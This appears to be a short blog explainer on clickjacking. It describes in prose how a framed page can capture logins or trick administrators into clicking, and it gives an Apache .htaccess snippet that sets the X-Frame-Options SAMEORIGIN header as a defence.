
What is clickjacking
In simple words Clickjacking means users are tricked into clicking or keystroking on a different site/page making them think they are on their usual site.
How can that be a problem from security point of view. Here is an example
An example of Clickjacking
Lets assume you own a website my_domain.com and you login to it everyday. If this site is not protected from clickjacking a hacker may be able to call this site in an iframe on some page hosted on his domain some_domain_owned_by_hacker.com
Now the hacker also adds some javascript to this page which records users keystrokes.
Through some means the hacker may trick you in clicking and opening this page. If you do not notice the domain name in the URL then you may feel that it is your own website and may even log in.
Due to the keystroke recording script the hacker is then able to get your password.
However you may feel that you always check the domain name before performing any transaction on a website and more so if it is your own website. So would this still be a problem?
Remember that the hacker can even trick other administrators on your site and they may not be as careful as you are and it follows the same about your website users.
Further to this
Let’s assume you are already logged in to your website and the hacker tricks you in clicking some button on his page. Through the above mentioned iframe and button overlapping the hacker may perform a malicious administrative task on your website on your behalf by just tricking you to click on a link.
Solution to prevent clickjacking using X-Frame-Options
Solution to this is very simple. Simple add below code in your .htaccess file
1 2 3 |
<ifModule mod_headers.c> Header always append X-Frame-Options SAMEORIGIN </ifModule> |
The above code checks if the page called within iframe is from the same origin. If not it does not display the page
For more information read Clickjacking – OWASP